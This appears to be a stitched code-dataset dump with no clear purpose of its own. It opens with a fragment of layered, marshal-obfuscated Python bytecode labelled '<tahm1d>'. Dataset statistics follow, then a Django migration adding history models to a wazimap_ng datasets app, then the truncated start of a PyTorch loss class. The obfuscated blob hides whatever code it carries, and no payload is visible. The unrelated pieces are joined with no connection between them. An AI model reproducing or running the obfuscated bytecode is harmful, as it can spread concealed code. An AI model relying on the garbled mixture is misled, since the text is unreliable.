00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01')
| 29,141.333333
| 87,408
| 0.749073
| 19,605
| 87,424
| 3.336853
| 0.041265
| 0.402819
| 0.332105
| 0.293126
| 0.845595
| 0.806081
| 0.760742
| 0.733243
| 0.721656
| 0.698773
| 0
| 0.402628
| 0.007538
| 87,424
| 2
| 87,409
| 43,712
| 0.351351
| 0
| 0
| 0
| 0
| 6
| 0.826901
| 0.769834
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.5
| 0.5
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 20
|
25d029ea726c72c60feb31b3264d593ff437ceb7
| 11,126
|
py
|
Python
|
wazimap_ng/datasets/migrations/0125_historicaldataset_historicaldatasetfile_historicalgeographyhierarchy_historicalgroup_historicalindic.py
|
OpenUpSA/wazimap-ng
|
57334e6da319482aa4ff2fde86c4ec27c30ee8d6
|
[
"Apache-2.0"
] | 11
|
2019-12-31T20:27:22.000Z
|
2022-03-10T03:55:38.000Z
|
wazimap_ng/datasets/migrations/0125_historicaldataset_historicaldatasetfile_historicalgeographyhierarchy_historicalgroup_historicalindic.py
|
OpenUpSA/wazimap-ng
|
57334e6da319482aa4ff2fde86c4ec27c30ee8d6
|
[
"Apache-2.0"
] | 164
|
2020-02-06T15:02:22.000Z
|
2022-03-30T22:42:00.000Z
|
wazimap_ng/datasets/migrations/0125_historicaldataset_historicaldatasetfile_historicalgeographyhierarchy_historicalgroup_historicalindic.py
|
OpenUpSA/wazimap-ng
|
57334e6da319482aa4ff2fde86c4ec27c30ee8d6
|
[
"Apache-2.0"
] | 16
|
2020-01-03T20:30:24.000Z
|
2022-01-11T11:05:15.000Z
|
# Generated by Django 2.2.24 on 2021-11-10 08:23
from django.conf import settings
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
import tinymce.models
import wazimap_ng.datasets.models.upload
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('profile', '0049_auto_20211007_1056'),
('django_q', '0014_schedule_cluster'),
('datasets', '0124_auto_20211009_1012'),
]
operations = [
migrations.CreateModel(
name='HistoricalUniverse',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created', models.DateTimeField(blank=True, editable=False)),
('updated', models.DateTimeField(blank=True, editable=False)),
('filters', django.contrib.postgres.fields.jsonb.JSONField()),
('label', models.CharField(max_length=100)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical universe',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalIndicator',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created', models.DateTimeField(blank=True, editable=False)),
('updated', models.DateTimeField(blank=True, editable=False)),
('groups', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=150), blank=True, default=list, size=None)),
('name', models.CharField(max_length=50)),
('subindicators', django.contrib.postgres.fields.jsonb.JSONField(blank=True, default=list, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('dataset', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Dataset')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('universe', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Universe')),
],
options={
'verbose_name': 'historical Variable',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalGroup',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created', models.DateTimeField(blank=True, editable=False)),
('updated', models.DateTimeField(blank=True, editable=False)),
('name', models.CharField(max_length=100)),
('subindicators', django.contrib.postgres.fields.jsonb.JSONField(blank=True, default=list)),
('can_aggregate', models.BooleanField(default=True)),
('can_filter', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('dataset', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Dataset')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical SubindicatorsGroup',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalGeographyHierarchy',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created', models.DateTimeField(blank=True, editable=False)),
('updated', models.DateTimeField(blank=True, editable=False)),
('name', models.CharField(max_length=50)),
('description', tinymce.models.HTMLField(blank=True)),
('configuration', django.contrib.postgres.fields.jsonb.JSONField(blank=True, default=dict)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('root_geography', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Geography')),
],
options={
'verbose_name': 'historical geography hierarchy',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalDatasetFile',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created', models.DateTimeField(blank=True, editable=False)),
('updated', models.DateTimeField(blank=True, editable=False)),
('document', models.TextField(help_text='\n Uploaded document should be less than 3000.0 MiB in size and \n file extensions should be one of xls, xlsx, csv.\n ', max_length=100, validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['xls', 'xlsx', 'csv']), wazimap_ng.datasets.models.upload.file_size])),
('name', models.CharField(max_length=60)),
('dataset_id', models.PositiveSmallIntegerField(blank=True, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('task', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='django_q.Task')),
],
options={
'verbose_name': 'historical dataset file',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalDataset',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created', models.DateTimeField(blank=True, editable=False)),
('updated', models.DateTimeField(blank=True, editable=False)),
('name', models.CharField(max_length=60)),
('groups', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=200), blank=True, default=list, size=None)),
('permission_type', models.CharField(choices=[('private', 'Private'), ('public', 'Public')], default='private', max_length=32)),
('content_type', models.CharField(choices=[('quantitative', 'Quantitative'), ('qualitative', 'Qualitative')], default='quantitative', max_length=32)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('profile', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='profile.Profile')),
('version', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Version')),
],
options={
'verbose_name': 'historical dataset',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
]
| 67.430303
| 372
| 0.614596
| 1,128
| 11,126
| 5.875887
| 0.149823
| 0.043452
| 0.029572
| 0.04647
| 0.802203
| 0.762372
| 0.738081
| 0.738081
| 0.738081
| 0.729481
| 0
| 0.012609
| 0.230182
| 11,126
| 164
| 373
| 67.841463
| 0.761238
| 0.004134
| 0
| 0.64557
| 1
| 0.006329
| 0.180719
| 0.021845
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.056962
| 0
| 0.075949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3173660530d5cf2a6db7c83517b7b1b7e7b02fb
| 5,274
|
py
|
Python
|
src/DGLoss.py
|
ChanWoo25/denoise-imu-gyro
|
a72baa36d5ab40b61323ce80de8c73ae6e6932f7
|
[
"MIT"
] | null | null | null |
src/DGLoss.py
|
ChanWoo25/denoise-imu-gyro
|
a72baa36d5ab40b61323ce80de8c73ae6e6932f7
|
[
"MIT"
] | null | null | null |
src/DGLoss.py
|
ChanWoo25/denoise-imu-gyro
|
a72baa36d5ab40b61323ce80de8c73ae6e6932f7
|
[
"MIT"
] | null | null | null |
import torch
import numpy as np
from src.utils import bmtm, vnorm, fast_acc_integration
from src.lie_algebra import SO3
class DGLossVer1(torch.nn.Module):
"""Loss for low-frequency orientation increment"""
def __init__(self, params): # w, min_N, max_N, dt, huber
super().__init__()
# windows sizes
self.min_N = params['train']['loss']['min_N']
self.max_N = params['train']['loss']['max_N']
